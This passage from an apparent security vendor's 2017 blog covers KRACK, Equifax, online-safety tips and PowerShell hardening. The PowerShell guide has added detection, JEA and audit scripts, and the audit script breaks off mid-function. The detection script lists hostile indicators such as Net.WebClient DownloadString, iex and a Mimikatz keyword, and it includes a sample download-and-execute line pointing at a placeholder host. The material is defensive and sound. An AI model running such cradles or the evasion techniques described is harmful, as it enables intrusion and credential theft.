    1. Enumerate connected devices. Use your wireless control software to enumerate all connected devices and create an inventory. The connected devices will give an indication of the risk posed. Look out for Internet of Things devices, such as printers, and any Android or embedded Linux devices.
    2. Patch your vulnerable connected devices. The first priority is, predictably, to patch vulnerable devices. More patches are expected over the next 24 hours, so monitor for updates. As mentioned earlier in the blog, Bleeping Computer and US CERT have both provided good updates on this.
    3. Adopt a second layer of security. Despite well-known issues with some VPNs, having non-wired internet users connected by VPN is a good interim measure. Adopting cryptographic protocols, such as Transport Layer Security (TLS/SSL), is another option.
    4. Consider a wired connection. Based on the extent to which your connected devices are vulnerable, consider switching to an Ethernet connection. While this might not be scalable for an enterprise campus, it is a consideration should the severity increase over the upcoming days.
    5. Stay up-to-date on the latest KRACK news. There will be more to come, so stay tuned for further updates.


    Simply Put, Effective Cybersecurity is the Strength Sum of Its Parts Wed, 11 Oct 2017 14:50:10 +0000 Today’s cybersecurity landscape, dominated as it is by professional threat actors, state sponsored attackers and hacktivists, requires a more consistent and integrated approach from governments and businesses around the world through to technology vendors. Having the very best solution remains critical, but if it is isolated inside a corporate infrastructure, the bad guys will likely eventually find a way around it.

    Meaningful partnerships with an integrated technology approach bring together best of breed solutions in a manner that enterprises can greatly improve their overall security posture, reducing overall exposure and protecting investment.

    We recognize that while Digital Shadows’ SearchLight solution remains a market leader in digital risk management, solving several significant challenges for customers today, by working with market leading technology partners we can offer our mutual customers an incrementally more effective solution to combat cybersecurity threats.

    This is why we are excited that today we announced our Digital Risk Management Technology Ecosystem featuring 11 leading security technology companies, with more expected to join in the coming months. We have spent months working diligently to locate partners who all share a vision for how security analytics and security information and event management (SIEM), product orchestration and automation, risk and compliance, intelligence and network enforcement, must work together to best protect customers from today’s digital risks.

    Our initial ecosystem members will bring their individual, industry-proven strengths to enhance Digital Shadows’ intelligence and digital risk management capabilities which extend across the widest range of data sources within the open, deep and dark web to protect customers around the world.

    Just last month we announced similar partnerships with Splunk and ServiceNow and we are convinced that these kinds of alliances and partnerships are the best way to protect our customers around the world so they can maximize and tap the huge benefits the digital economy brings.

    To learn more, read our full press release here.

    Simple Steps to Online Safety Thu, 05 Oct 2017 14:48:15 +0000 On the heels of some very high-profile and disturbing data breaches, this year’s Cyber Security Awareness Month is timely. This October comes after announcements of major data breaches at Equifax, Deloitte and the Securities and Exchange Commission, and with the increased publicity and impact of social media, the attention and respect that cyber security, information security and data security deserve are starting to pick up steam.

    The first step in making changes is building awareness, and this blog relates to National Cyber Security Month’s Week 1 theme, ‘Simple steps to online safety’. It will help consumers understand the threats and how to protect themselves, including what to do if they become a victim of cyber-crime.

    Protecting yourself online may seem impossible, but following simple guidelines like enabling stronger authentication, strong password management, and regular update installation can do wonders to protect you from cybercrime.

    Enable Stronger Authentication

    1. Extra layers of security beyond a password are available from most email providers, social media platforms, and financial institutions. Taking advantage of this multifactor authentication helps assure authorized access to all accounts. Remember that all MFA isn’t made equal; MFA that relies on SMS comes with problems of its own.

    Figure 1 – An advertisement for SS7 bypass services on the dark web

    2. Install updates for apps and software on your devices as soon as they are available. Keeping software up to date will prevent cybercriminals from taking advantage of known vulnerabilities.

    3. Do not open emails, links, or attachments from strangers. Phishing attacks often use email or malicious websites or links to infect your device with malware, which can gain access to personal and financial information or accounts.

    Remain Skeptical

    1. As a consumer, stay skeptical. Unless you are dealing with a known and reputable company, those amazing deals are probably amazing frauds. Fake shopping websites are very sophisticated with professional designs often mimicking legitimate sites.

    Figure 2 – An advertisement for fraudulent goods on the dark web. Not all offers will be this obvious!

    2. The domain name is the best giveaway – look out for those that are long, with lots of hyphens, slashes, or special characters that include popular brands or stores, but with extra letters or numbers (e.g., www[.]cheapapp1estuff[.]com).

    3. Also, the URL in the checkout section should start with https:// and have a padlock icon to the left of it indicating SSL encryption; exit immediately if it doesn’t. (Equally, remember that the presence of a padlock icon does not make the site definitely secure!) Don’t assume that links from trusted sites confer legitimacy: Facebook ads have linked to bogus Ray-Ban sites and Instagram promoted a phishing site that lured buyers with discounted Adidas and Coach merchandise.
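The domain-name giveaways listed above can be turned into a simple screening check. The following is an added example written for this page (not Digital Shadows’ code); the brand list, length and hyphen thresholds, and the digit-for-letter substitution table are constructed assumptions for illustration, and the registrable-name logic assumes a single-label TLD such as .com.

```python
import re

# Added example: heuristic screen for lookalike shop domains, following the
# post's advice: long names, lots of hyphens or special characters, and a
# well-known brand embedded in a longer name or spelled with digits in place
# of letters (e.g. "app1e"). Everything below is a constructed illustration.

BRANDS = ["apple", "adidas", "coach", "rayban", "facebook", "instagram"]
MAX_HOST_LEN = 30   # constructed threshold: longer hostnames are flagged
MAX_HYPHENS = 2     # constructed threshold: more hyphens than this is flagged

# Digits commonly substituted for letters in lookalike names (constructed).
LEET = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a", "5": "s", "7": "t"})


def normalize_host(url):
    """Lower-case hostname from a URL or bare host; accepts defanged '[.]'."""
    s = url.strip().lower().replace("[.]", ".")
    s = re.sub(r"^[a-z][a-z0-9+.-]*://", "", s)   # drop scheme
    s = s.split("/", 1)[0].split("?", 1)[0]         # drop path and query
    s = s.rsplit("@", 1)[-1].split(":", 1)[0]       # drop userinfo and port
    return s.strip(".")


def registrable_name(host):
    """Second-level label, e.g. 'apple' for store.apple.com.

    Assumes a single-label TLD; multi-part suffixes like .co.uk are not handled.
    """
    labels = host.split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def lookalike_indicators(url):
    """Return the set of indicator codes that fire for the given URL/host."""
    host = normalize_host(url)
    name = registrable_name(host)
    findings = set()

    if len(host) > MAX_HOST_LEN:
        findings.add("long")
    if host.count("-") > MAX_HYPHENS:
        findings.add("hyphens")
    if re.search(r"[^a-z0-9.-]", host):
        findings.add("odd_chars")

    # Compare brands against the name with hyphens removed, both as written
    # and after undoing common digit-for-letter substitutions.
    raw = name.replace("-", "")
    deleet = raw.translate(LEET)
    for brand in BRANDS:
        if brand in raw:
            if raw != brand:                # brand wrapped in extra letters
                findings.add("brand_embedded:" + brand)
        elif brand in deleet:               # brand only visible after de-leeting
            findings.add("brand_substituted:" + brand)
    return findings


def is_suspicious(url):
    return bool(lookalike_indicators(url))


if __name__ == "__main__":
    # Constructed sample inputs; the first is the example from the post.
    for sample in ("www[.]cheapapp1estuff[.]com",
                   "https://store.apple.com/checkout",
                   "ray-ban-outlet-sale-official-discount.com"):
        print(sample, "->", sorted(lookalike_indicators(sample)) or "no indicators")
```

A flag is a prompt to look closer, not proof of fraud; the post's other advice (https and the padlock, scepticism about deals) still applies to domains that pass.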

    Do Your Research On IoT And UPNP Devices

    1. DDoS attacks are only one possible threat from infected IoT devices, and the diversity amongst IoT hardware and software makes them extremely difficult to secure. Most IoT devices are meant to be install-and-forget and were not built with patching and updating in mind, so security maintenance is very challenging if not impossible.

    2. No one is suggesting that you strike those smart TVs or personal drones off your holiday shopping list, but it is imperative for consumers to stay informed. Do your homework – read online reviews and make sure you’re aware of any security issues. The first time you turn the device on, change default passwords and check for updates and patches. Make sure your home Wi-Fi network is secure and avoid public Wi-Fi when possible.

    Use Common-Sense

    1. When shopping online, use a credit card, not debit, to limit your losses in case of fraud. Don’t make purchases or check bank statements over public Wi-Fi, as malicious actors can intercept data, capture your web traffic, or redirect you to malware or phishing sites. If you use public Wi-Fi frequently, consider encrypting your traffic via a personal VPN connection service. Monitor your bank and credit card transactions frequently and set alerts for suspicious activity.

    All members of the public can take some simple actions to protect themselves online and to recover in the event a cyber incident occurs. Cybercriminals often prey on human error – such as people clicking on a link in a phishing email or using weak or repeated passwords – to gain access to home networks and financial or social media accounts. You can’t eliminate every risk, but you can keep yourself safer while enjoying this connected world.

    Gearing Up For National Cyber Security Awareness Month Tue, 03 Oct 2017 14:34:01 +0000 I’m going to go out on a limb and say that I’m probably not the only one that’s pleased to see the back of September. The cinders of the Equifax breach continue to fall into October and, irrespective of the identities of the actors behind the breach, the impact of the exposed 143 million Social Security Numbers will have a long tail.


    In light of this, it’s probably a good time to reflect on the current state of security. Which is just as well, given that we’re two days into the first week of the annual National Cyber Security Month (U.S.) and CyberSecMonth (Europe). It’s a great opportunity to look at ways to overcome the challenges we face. As a reminder, here are the weekly themes for the respective U.S. and European security awareness months.

    Date              | United States Theme                                        | European Theme
    Week 1: Oct 2-6   | Simple Steps to Online Safety                              | Cyber Security in Workplace
    Week 2: Oct 9-13  | Cybersecurity in the Workplace is Everyone’s Business      | Governance, Privacy & Data Protection
    Week 3: Oct 16-20 | Today’s Predictions for Tomorrow’s Internet                | Cyber Security in the Home
    Week 4: Oct 23-27 | The Internet Wants YOU: Consider a Career in Cybersecurity | Skills in Cyber Security
    Week 5: Oct 30-31 | Protecting Critical Infrastructure from Cyber Threats      |


    The U.S. and European themes do differ a little, but there are three common themes which apply to all organizations across the world.

    1. Increase In Connected Devices, And The Difficulty Of Managing The Risk

    Social media, mobile computing and cloud services have increased the ease and speed of communication, while simultaneously reducing the cost. The “internet of things” looks to add further complexity to this, with some forecasts claiming there will be 200 billion connected devices by 2020.

    This is tricky for organizations to manage, especially when they don’t directly control the flow of information. Employees, suppliers and other third parties are all sharing and exposing sensitive information. Keeping track of what data is shared and when it becomes exposed can cause regulatory headaches, privacy concerns and, ultimately, loss of revenue.

    2. Security Is An Issue Beyond The Security Department

    Week 2’s theme is “Cybersecurity in the Workplace is Everyone’s Business”, which ties into two main areas: building a culture of cybersecurity and security as a strategic issue.

    Building a culture of cybersecurity is something we’ve written about a good amount (here you can read our blogs on Security Culture and Resilience). This is important to ensure every individual within the organization is vigilant and feels like they can report security issues. Security isn’t something that starts and stops at the SOC.

    As Equifax’s share price is testament to, security has strategic implications and, as such, it should be strategically driven. Boards need to understand that weaknesses in an organization’s security posture can have significant strategic implications. At the same time, employees need to do a better job of communicating this risk to the board.

    3. Security Teams Are Held Back By A Skills Shortage

    In his keynote presentation at the 2017 SANS CTI Summit, Cliff Stoll recalled that he and his team had “Zero budget, zero expertise and zero mandate.” While Cliff was talking about the 1980s, these three challenges remain.

    Hiring good people and building up expertise remain some of the biggest challenges, which is why it’s great to see the focus on skills shortage. The underrepresentation of women in security is a problem that continues to plague the industry, and we’ll be digging deeper into this in Week 2.

    However, a lack of diversity extends beyond gender inequality; it includes the need to train individuals from diverse backgrounds. Having a broader range of backgrounds and skills is important in helping teams avoid falling into groupthink and other cognitive biases.

    We’ll be publishing blogs on these weekly themes, so stay tuned.

    2017 Equifax Breach: Impact and Lessons Learned Thu, 28 Sep 2017 14:24:23 +0000 Equifax experienced a data breach that occurred in mid-May 2017, was first discovered on 29 Jul 2017, and was publicly disclosed by the company on 07 Sep 2017. The breach affected 143 million individuals in the United States, Canada and the United Kingdom. Immediately after the disclosure Equifax faced widespread criticism from the media, researchers and customers. There have also been allegations of insider trading and legal implications. In our paper Equifax Breach: Lessons Learned for Your Organizations, we outline how the events surrounding the breach demonstrate several important learning points organizations can use to inform their own security posture.


    The largest immediate impact to Equifax was loss of investor confidence; the share price dropped 34 percent within eight days after the breach disclosure. The company also risks revenue loss resulting from reduced business, especially considering customers’ loss of confidence in the company to secure data. As with all data breaches, Equifax will also incur financial losses through its responsive investigations and, likely, costs resulting from lawsuits.

    Swift public criticism followed around Equifax’s security posture, its handling of the breach and the exposure of the sensitive customer data. Some employees have been accused of insider trading, and others have reportedly left their positions, such as the chief security officer and chief information officer. Reputational damage may have a mid- to long-term effect on the company’s revenue generation and a prolonged impact on its finances.

    The key lessons organizations can learn from this event are:

    • Maintain an external view of your digital footprint to be aware of what an attacker can access, what is vulnerable to attack and what methods attackers are using against your sector.
    • Establish and maintain a threat intelligence program, and act on the intelligence; Digital Shadows provided clients with multiple alerts about exploitation of the vulnerability that affected Equifax, prior to the intrusion.
    • Implement and follow general cyber-security good practice measures, such as defense-in-depth, including vulnerability management. Plan as if an attacker will compromise your network and ensure your sensitive information will be protected.
    • Assume a breach will occur and plan for this outcome. Ensure people, processes and strategy are in place in advance of it.
    • Control knowledge of a breach to trusted individuals and prepare for announcements by analyzing the possible consequences of decisions.
    • Communicate clearly when a breach happens, stating the knowns and unknowns publicly. Speculation from media and researchers can damage reputation.
    • Look for your compromised data online, to try to discern the attacker’s motive. Understanding whether the motive was financial gain may help mitigate against prolonged malicious activity.

    Download a copy of our paper to learn more about the impact of the breach and the lessons organizations can learn at three different stages: pre-breach, post-discovery and post-disclosure.

    PowerShell Security Best Practices Wed, 27 Sep 2017 12:45:18 +0000 Threat actors have long used legitimate tools to infiltrate and move laterally across defenders’ networks. The reasons for this are clear: the likelihood of being detected is much lower when authorized tools are leveraged instead of malicious tools that might trigger prevention or detection controls. PowerShell’s attributes have also made it attractive to adversaries; it was used most recently in the Petya/NotPetya campaign. In this blog, we will cover some PowerShell best practices that will prepare you for adversaries who will use your own PowerShell implementation against you.


    PowerShell is an automation platform and scripting language for Microsoft Windows and Windows Server, which allows you to simplify your system management. Unlike other text-based shells, PowerShell harnesses the power of Microsoft’s .NET Framework, providing rich objects and a massive set of built-in functions to take control of your Windows environments.



    PowerShell has been used heavily for cyber attacks, especially recently during the Petya/NotPetya campaigns. The most important aspect for attackers is its native integration with the .NET Framework, which offers multiple options for infecting or manipulating the target.

    PowerShell’s most attractive attributes to adversaries are:

    • Simple access to network sockets
    • Ability to assemble malicious binaries dynamically in memory
    • Direct access to the Win32 Application Programming Interface (API)
    • Simple interface with Windows Management Instrumentation (WMI)
    • Powerful scripting environment
    • Dynamic, runtime method calls
    • Easy access to crypto libraries, e.g. IPSec, hashing algorithms
    • Ability to hook managed code
    • Simple bindings to the Component Object Model (COM)

    All the above render PowerShell an extremely effective attack vector.

    PowerShell was initially mentioned as an attack platform in 2010, when it was presented at Def Con 18 as a proof of concept. Both a bind shell and a reverse shell programmed purely in PowerShell were demonstrated in the same context.

    There are numerous attack tools, like Nishang, PowerSploit, and the PowerShell Empire platform (www.PowerShellempire[.]com), that offer a post-exploitation agent built on encrypted communications. These tools can be used for reconnaissance, persistence, and lateral movement, as well as other offensive techniques. Of course, given its native capabilities, PowerShell can be programmed in multiple ways, providing custom tools and techniques that remain stealthy and undetected by common security controls and countermeasures.

    Adversarial Tactics, Techniques & Common Knowledge, or ATT&CK by Mitre, which provides an extensive list of attack vectors, tactics, and techniques, describes PowerShell as a powerful interface that adversaries can use to perform a variety of actions, and provides real-world examples.


    Given that PowerShell cannot be disabled or removed from organizations that require it, the following actions are the recommended best practices to use PowerShell efficiently while preventing its use as an attack vector.

    1. PSLockDownPolicy And PowerShell Constrained Language Mode

    Constrained language mode limits the capability of PowerShell to base functionality, removing advanced feature support, such as .NET and Windows API calls and COM access. This lack of advanced functionality stops most PowerShell attack tools, because they rely on these methods. However, in enterprise environments it can negatively affect legitimate scripts; thus it is highly recommended to schedule a testing period before activating this option, to filter out the legitimately used code.

    Enable Constrained Language Mode (sets the machine-wide lockdown policy; it takes effect in new PowerShell sessions):
    [Environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine')

    Enable via Group Policy:
    Computer Configuration\Preferences\Windows Settings\Environment

    2. PowerShell V.5 With AppLocker And Device Guard

    PowerShell v.5 comes with significant embedded security features that make its use more secure for enterprise environments. These security features include:

    • Script block logging. Script block logging provides the ability to log de-obfuscated PowerShell code to the event log.
    • System-wide transcripts. System-wide transcription can be enabled via Group Policy and provides an “over the shoulder” transcript file of every PowerShell command and code block executed on a system by every user on that system.
    • Constrained PowerShell. Constrained Language mode (as described above in best practice 1).
    • Antimalware integration (Windows 10). The new Windows 10 Antimalware Scan Interface (AMSI) enables all the scripting engines (PowerShell, VBScript, and JScript) to request analysis of dynamic content: from a script file, typed commands at the command line, and even code downloaded and executed in memory. This enables scanning of PowerShell code before it is executed on the computer.

    In addition, using AppLocker to block executables from unwanted user locations will provide better control.

    Device Guard, which is also available on Windows 10 and Windows Server 2016, can be used to enforce constrained language mode and application whitelisting by leveraging advanced hardware features where supported.

    3. Logging PowerShell Activity

    PowerShell logging can be enabled via Group Policy for PowerShell modules:

    • Microsoft.PowerShell.* (i.e., Microsoft.PowerShell.Management module) – Logs most of PowerShell’s core capability.
    • ActiveDirectory – Logs Active Directory cmdlet use. (A cmdlet is a lightweight Windows PowerShell script that performs a single function.)
    • BITS Transfer – Logs use of Background Intelligent Transfer Service (BITS) cmdlets.
    • CimCmdlets (2012R2/8.1) – Logs cmdlets that interface with Common Information Model (CIM).
    • GroupPolicy – Logs Group Policy cmdlet use.
    • Microsoft.WSMan.Management – Logs cmdlets that manage Web Services for Management (WS-Management) and Windows Remote Management (WinRM).
    • NetAdapter/NetConnection – Logs network-related cmdlets.
    • PSScheduledJob/ScheduledTasks (PSv5) – Logs cmdlets to manage scheduled jobs.
    • ServerManager – Logs Server Manager cmdlet use.
    • SmbShare – Logs Server Message Block (SMB) sharing activity.

    For these logs to be useful, they need to be fed into a central logging system with alerts configured for known attack methods.

    Relevant activity:

    • Downloads via .NET, e.g. (New-Object Net.WebClient).DownloadString
    • Invoke-Expression (and derivatives: “iex”)
    • BITS activity
    • Scheduled Task creation/deletion
    • PowerShell Remoting

    The best method to detect PowerShell attack code is to look for key indicators – code snippets required for the code to run correctly.

    Example: Detecting Mimikatz (a widely-used tool for capturing logged-on users’ credentials)
    Invoke-Mimikatz Event Log Keywords:

    "System.Reflection.Emit.AssemblyBuilderAccess"

    For obfuscated PowerShell, custom rules should be developed. For example:

    • Look for lots of brackets { }
    • Look for lots of quote marks ' "

    Both of these are heavily used in obfuscation techniques and usually are not used by legitimate software or normal administrators.
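The following script, added here as an example rather than taken from the original post, scores script blocks against the indicators above: the Invoke-Mimikatz keyword, the download cradle, Invoke-Expression and its iex alias, BITS and scheduled-task cmdlets, and the bracket/quote-mark heuristic for obfuscation. The thresholds and the sample script blocks are constructed assumptions; the event-log reader assumes script block logging (Event ID 4104) is enabled as described in best practice 2.

```powershell
# Added example, not part of the original post: score PowerShell script blocks against
# the indicators discussed above (known key strings plus the "lots of braces and
# quote marks" obfuscation heuristic). Thresholds and the sample script blocks below
# are constructed for illustration; tune the thresholds against your own baseline.

# Key indicator strings. The first is the Invoke-Mimikatz keyword from the post; the
# rest cover the .NET download cradle, Invoke-Expression, BITS and scheduled tasks.
$KeywordIndicators = @(
    'System.Reflection.Emit.AssemblyBuilderAccess',
    'Net.WebClient',
    'DownloadString',
    'Invoke-Expression',
    'Start-BitsTransfer',
    'Register-ScheduledTask'
)

function Measure-ScriptBlockRisk {
    param(
        [Parameter(Mandatory)][string]$ScriptText,
        [string]$Source = 'unknown',
        [int]$BraceThreshold = 20,      # assumed threshold: total count of { and }
        [int]$QuoteThreshold = 40       # assumed threshold: total count of ' and "
    )

    # Literal, case-insensitive substring match for each keyword
    $hits = @($KeywordIndicators | Where-Object { $ScriptText -match [regex]::Escape($_) })
    # The 'iex' alias only counts when it stands alone as a command token
    if ($ScriptText -match '(?i)(^|[\s;|(&])iex\b') { $hits += 'iex (alias)' }

    $braces = [regex]::Matches($ScriptText, '[{}]').Count
    $quotes = [regex]::Matches($ScriptText, "['`"]").Count
    $obfuscated = ($braces -ge $BraceThreshold) -or ($quotes -ge $QuoteThreshold)

    [pscustomobject]@{
        Source     = $Source
        Length     = $ScriptText.Length
        Keywords   = ($hits -join ', ')
        BraceCount = $braces
        QuoteCount = $quotes
        Obfuscated = $obfuscated
        Suspicious = ($hits.Count -gt 0) -or $obfuscated
    }
}

function Get-SuspiciousScriptBlockEvents {
    # Reads Event ID 4104 (script block logging) from the PowerShell Operational log
    # and scores each block. Properties[2] of a 4104 event holds the script text.
    param([int]$MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104
    } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            Measure-ScriptBlockRisk -ScriptText ([string]$_.Properties[2].Value) `
                                    -Source ("EventRecord {0}" -f $_.RecordId)
        } | Where-Object Suspicious
}

# Constructed sample script blocks (not real captured data)
$Samples = [ordered]@{
    'benign admin'     = 'Get-Service | Where-Object { $_.Status -eq "Running" } | Sort-Object Name'
    'download cradle'  = "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/a.ps1')"
    'mimikatz keyword' = '$x = [System.Reflection.Emit.AssemblyBuilderAccess]::Run'
    # Dense braces and quotes with no real content: stands in for an obfuscated block
    'obfuscated-like'  = ("{'a'}" * 30) + ('"b"' * 10)
}

$Samples.GetEnumerator() |
    ForEach-Object { Measure-ScriptBlockRisk -ScriptText $_.Value -Source $_.Key } |
    Format-Table Source, Keywords, BraceCount, QuoteCount, Obfuscated, Suspicious -AutoSize
```

On a host with script block logging enabled, Get-SuspiciousScriptBlockEvents returns only the scored 4104 events that tripped a keyword or the obfuscation heuristic, ready to forward to the central logging system mentioned above.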

    4. Remove PowerShell V.2

    It is obvious that the security features integrated in the latest versions of PowerShell do not apply to v.2, which makes its use very attractive to adversaries: PowerShell v.2 can be used for lateral movement and persistence techniques with the same functionality. PowerShell v.2’s extra value to attackers is that, because it has no native logging capabilities, it remains undetected and offers stealth in their operations.

    For that and other reasons, Microsoft has recently announced that PowerShell v.2 will be deprecated from the next Windows 10 update, which is scheduled for this September, so either way it is highly recommended to check for and remove PowerShell v.2 from your environment.

    You can check whether Windows PowerShell 2.0 is installed by running the following (as an administrator).

    • On Windows 7/8.1/10, the following will return a State as either Enabled or Disabled:
      • Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2
    • On Windows Server, the following will return an InstallState of either Installed or Removed:
      • Get-WindowsFeature PowerShell-V2

    5. Just Enough Administration – JEA

    JEA is included with the latest update of Windows Management Framework 5.0 and 5.1. It is a security technology that helps organizations enforce information security by restricting IT administrative rights. JEA provides a practical, role-based approach to set up and automate restrictions for IT personnel, and reduces the risks associated with granting users full administrative rights, following the principle of least privilege.

    JEA is implemented as a Windows PowerShell session endpoint (it requires PS remoting to be enabled), which includes a PowerShell Session Configuration file and one or more Role Capability files.

    • PowerShell Session Configuration file. This file specifies who can connect to an endpoint: users and security groups are mapped to specific management roles. These files are specific to each machine, so access can be controlled per machine. They contain the name of the JEA endpoint, which roles will be assigned and, of course, who will have access to the endpoint. These files are PowerShell data files ending in a .pssc extension.
    • Role Capability files. These files specify what actions users in a particular role can perform. For example, a role can be restricted to certain pre-selected cmdlets, functions and external programs, making the use of custom, potentially malicious cmdlets practically impossible. Examples of potentially dangerous commands that should be constrained are ‘Start-Process’, ‘New-Service’, ‘Invoke-Item’, etc. Detailed information on how to create such files can be found here.
    • JEA configuration samples. Examples and templates can be found in Microsoft’s JEA GitHub repository.

    Finally, another significant benefit of JEA is the actionable logging and reporting which is available in the Windows event log format, since all operations performed through the JEA endpoint can be recorded (with transcripts and logs) and show who accessed the environment and when, and what changes were made.
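As an added example (not the post’s own code, nor one of Microsoft’s JEA samples), the following builds the two file types described above into a working endpoint: a Role Capability file that exposes Get-Service and a Restart-Service limited to one service, and a Session Configuration file that maps a group to that role, runs under a virtual account and writes transcripts. The module name, endpoint name, group, user and transcript directory are assumed placeholders.

```powershell
# Added example, not from the original post or Microsoft's JEA samples: a minimal JEA
# endpoint for a helpdesk role that may list services and restart only the Spooler.
# The module name, endpoint name, group, user and transcript path are assumptions.
# Run elevated on the target server (Windows PowerShell 5.1, PS remoting enabled).

$ModuleName    = 'HelpdeskJEA'          # assumed module name
$EndpointName  = 'Helpdesk'             # assumed endpoint name
$HelpdeskGroup = 'CONTOSO\Helpdesk'     # assumed security group
$TestUser      = 'CONTOSO\jdoe'         # assumed member of that group
$TranscriptDir = 'C:\JEATranscripts'    # assumed transcript location

# Role capability files must live in a RoleCapabilities folder inside a module on the
# module path; JEA resolves them by file name across all such modules.
$ModulePath = Join-Path $env:ProgramFiles "WindowsPowerShell\Modules\$ModuleName"
$RoleDir    = Join-Path $ModulePath 'RoleCapabilities'
New-Item -ItemType Directory -Path $RoleDir, $TranscriptDir -Force | Out-Null
New-ModuleManifest -Path (Join-Path $ModulePath "$ModuleName.psd1")

# 1. Role Capability file (.psrc): what this role may run. Restart-Service is exposed
#    only with -Name restricted to 'Spooler'; Start-Process, New-Service etc. stay hidden.
$VisibleCmdlets = @(
    'Get-Service',
    @{ Name = 'Restart-Service'; Parameters = @{ Name = 'Name'; ValidateSet = 'Spooler' } }
)
New-PSRoleCapabilityFile -Path (Join-Path $RoleDir 'ServiceOperator.psrc') `
    -Description 'Helpdesk: view services, restart Spooler only' `
    -VisibleCmdlets $VisibleCmdlets

# 2. Session Configuration file (.pssc): who gets which role on this machine.
#    RestrictedRemoteServer yields a NoLanguage session exposing only the listed commands;
#    the virtual account lets helpdesk staff act as local admin without holding those rights.
$Roles = @{}
$Roles[$HelpdeskGroup] = @{ RoleCapabilities = 'ServiceOperator' }
$SessionFile = Join-Path $env:TEMP "$EndpointName.pssc"
New-PSSessionConfigurationFile -Path $SessionFile `
    -SessionType RestrictedRemoteServer `
    -RunAsVirtualAccount `
    -TranscriptDirectory $TranscriptDir `
    -RoleDefinitions $Roles

if (-not (Test-PSSessionConfigurationFile -Path $SessionFile)) {
    throw "Session configuration file failed validation: $SessionFile"
}

# 3. Register the endpoint (this restarts WinRM). Users then connect with:
#    Enter-PSSession -ComputerName <server> -ConfigurationName Helpdesk
Register-PSSessionConfiguration -Name $EndpointName -Path $SessionFile -Force | Out-Null

# Verify what a member of the group would actually see inside the endpoint
Get-PSSessionCapability -ConfigurationName $EndpointName -Username $TestUser |
    Select-Object Name, CommandType
```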

    6. Script Code Signing

    If PowerShell scripts are used in an enterprise environment, code signing is another control that improves security posture by ensuring authenticity and integrity. This feature, along with an Execution Policy (set locally or via Group Policy) of “AllSigned” or “RemoteSigned”, will permit only digitally signed scripts to run. However, several attacks in the past have used digitally signed malicious files, so this control can be bypassed and should be treated as one additional security layer rather than a complete defense.


    Because PowerShell is being monitored more and more by the day, adversaries have come up with techniques that evade detection, including:

    • Version downgrade to PowerShell v.2
    • Custom use of .NET Framework without PowerShell.exe execution
    • PowerShell obfuscation (invoke-obfuscation)

    These are just indicative techniques; further analysis is not within the scope of this document. However, the “Logging PowerShell Activity” best practices will detect most of them.


    The most significant recommendation, after reviewing most of the known attack techniques used recently, is upgrading to Windows 10 and PowerShell v.5 with all security features enabled and removing PowerShell v.2 as well. However, this is not easily feasible for most enterprise environments; of equal priority are activating embedded security features and extensive logging focused on specific indicators commonly used for attacking techniques.
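The audit script below is an added example, not code from the original post: it checks a single host against best practices 1 to 4 and 6 (language mode, PowerShell version, script block/module/transcription logging, the v.2 engine and the execution policy) and returns a pass/fail table. The registry paths are the policy keys that PowerShell reads for the Group Policy settings named above; the feature names are the ones the post gives.

```powershell
# Added example, not from the original post: audit one host against best practices
# 1 to 4 and 6 above. Run elevated in Windows PowerShell 5.x on Windows 10 / Server 2016.
# The HKLM policy keys are the ones PowerShell reads for the Group Policy settings named
# in the post; the v.2 feature names are the ones the post gives.

function Get-PolicyValue {
    param([string]$Key, [string]$Name)
    # $null when the policy key or value is absent (i.e. the setting is not configured)
    try { (Get-ItemProperty -Path $Key -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

function Test-PowerShellHardening {
    $base    = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    $results = New-Object System.Collections.Generic.List[object]
    $add = { param($Control, $Pass, $Detail)
        $results.Add([pscustomobject]@{ Control = $Control; Pass = [bool]$Pass; Detail = $Detail }) }

    # 1. Constrained Language Mode (via __PSLockdownPolicy, as described in best practice 1)
    $mode     = $ExecutionContext.SessionState.LanguageMode
    $lockdown = [Environment]::GetEnvironmentVariable('__PSLockdownPolicy', 'Machine')
    & $add 'Constrained Language Mode' ($mode -eq 'ConstrainedLanguage') "LanguageMode=$mode; __PSLockdownPolicy=$lockdown"

    # 2. PowerShell v.5 engine in use
    $ver = $PSVersionTable.PSVersion
    & $add 'PowerShell v.5 or later' ($ver.Major -ge 5) "PSVersion=$ver"

    # 3. Logging: script block logging, module logging (with at least one module), transcription
    $sbl = Get-PolicyValue "$base\ScriptBlockLogging" 'EnableScriptBlockLogging'
    & $add 'Script block logging' ($sbl -eq 1) "EnableScriptBlockLogging=$sbl"

    $mod     = Get-PolicyValue "$base\ModuleLogging" 'EnableModuleLogging'
    $modules = @((Get-Item "$base\ModuleLogging\ModuleNames" -ErrorAction SilentlyContinue).Property)
    & $add 'Module logging' (($mod -eq 1) -and ($modules.Count -gt 0)) "EnableModuleLogging=$mod; modules=$($modules -join ',')"

    $tr  = Get-PolicyValue "$base\Transcription" 'EnableTranscripting'
    $dir = Get-PolicyValue "$base\Transcription" 'OutputDirectory'
    & $add 'System-wide transcription' ($tr -eq 1) "EnableTranscripting=$tr; OutputDirectory=$dir"

    # 4. PowerShell v.2 engine removed (Get-WindowsFeature exists only on Windows Server)
    $v2 = $null
    if (Get-Command Get-WindowsFeature -ErrorAction SilentlyContinue) {
        $f = Get-WindowsFeature PowerShell-V2 -ErrorAction SilentlyContinue
        if ($f) { $v2 = ($f.InstallState -eq 'Installed') }
    } elseif (Get-Command Get-WindowsOptionalFeature -ErrorAction SilentlyContinue) {
        $f = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2 -ErrorAction SilentlyContinue
        if ($f) { $v2 = ($f.State -eq 'Enabled') }
    }
    $v2Detail = if ($null -eq $v2) { 'state unknown' } else { "v2 present=$v2" }
    # Removal on Windows 10: Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root
    & $add 'PowerShell v.2 removed' ($v2 -eq $false) $v2Detail

    # 6. Execution policy restricts unsigned scripts
    $ep     = Get-ExecutionPolicy
    $scopes = (Get-ExecutionPolicy -List | ForEach-Object { "$($_.Scope)=$($_.ExecutionPolicy)" }) -join '; '
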